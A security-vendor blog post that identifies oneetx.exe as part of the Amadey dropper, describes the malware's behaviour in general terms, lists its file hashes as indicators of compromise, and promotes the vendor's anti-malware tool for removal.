It appears that oneetx.exe does not belong to any program. Moreover, Google contains clear clues that this process belongs to malware that has acted as a backbone of the Russian botnet since 2018. The most obvious guess is, of course, Emotet malware. It is known for having possibly the most extensive networks on the planet. However, in this case, the short research showed the relation of oneetx.exe to the Amadey dropper.

What is Amadey?

Amadey is a dropper (a.k.a downloader) malware, that has only one purpose – deliver other malware to the infected system. It often acts as a precursor, that makes sure the system is not in a banned region and is not a debug environment. It can deliver a wide range of threats – from the aforementioned Emotet to RedLine stealer and even STOP/Djvu ransomware. Even after delivering the payload, it remains active, waiting for other commands from hackers.

Aimed at long-term stay in the system, Amadey does its best in hiding from users and anti-malware software. Choosing an unremarkable name is only a small part of the way it disguises itself. First of all, each of its samples is repacked in a specific way, making it harder for antiviruses to detect. Amadey typically arrives within phishing emails with attached Office documents. Upon execution, malware moves its files from the original directory to the other folder, depending on the antivirus software present in the system. All these actions make it a pretty tough nut for “classic” antiviruses.

IoC Amadey Dropper

• Trojan.Win32.Amadey.tr: ed0b15b82c2dba6a4516c5a0f5268a95fd7fe8aead707272a096d8ef47db92c0
• Trojan.Win32.Amadey.tr: c36ed034d523da1f54d43176334d4bda9f9adcb940948646b43902a620ebda45
• Trojan.Win32.Amadey.tr: 28c789c3953a7383ef6d9876e2aaf5bb91393b0be4b8c8919845a2428920e751
• Trojan.Amadey.65344.dd!yf: bef6710dbe58cb2a400e94e471509b8bb3605ef74ba6c177f9744254ab2278e3
• Trojan.Win32.Amadey.tr: 7b4dc90b59760320253596a753556de932a32fd1967726b7321a0095760f7bcf
• Trojan.Win32.Amadey.tr: 6f31b1b2b0f080c1569d5dfb2840244be2c8ef84824b0fecf686c6e42def3aa7
• Trojan.U.Amadey.tr: 2cdda26cc29f1ab91873bf2de8af2627aa7fa73002cb490f2f1ab73ff824ebf8
• Trojan.Win32.Amadey.tr: 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922
• Trojan.Win32.Amadey.tr: 5ec0957697ef3692607bc8a8d00bdad0ff86c129ead5fb698c035f4d6b47c69c
• Trojan.Win32.Amadey.bot: d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce

How to remove Oneetx.exe?

You will likely fail to remove Oneetx.exe from your system manually. It performs a row of actions for persistence provision, which forces the user to locate and remove all the changes it does to the system before touching the files. For that reason, I’d recommend using GridinSoft Anti-Malware – a program that specialises in removing threats like Amadey dropper.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The program will not only help you with removing this malware, but also prevent any further infections. Its detection system makes it effective even against the newest tricks – regardless of the way they’re packed. However, anti-malware software should be your last line of defense. To stay secure, it is better to avoid any muddy waters at all. In the case of Amadey malware, the key is to be vigilant when you deal with email messages. Read our detailed analysis of modern spam emails and the way to recognise them.

The post Oneetx.exe appeared first on Gridinsoft Blog.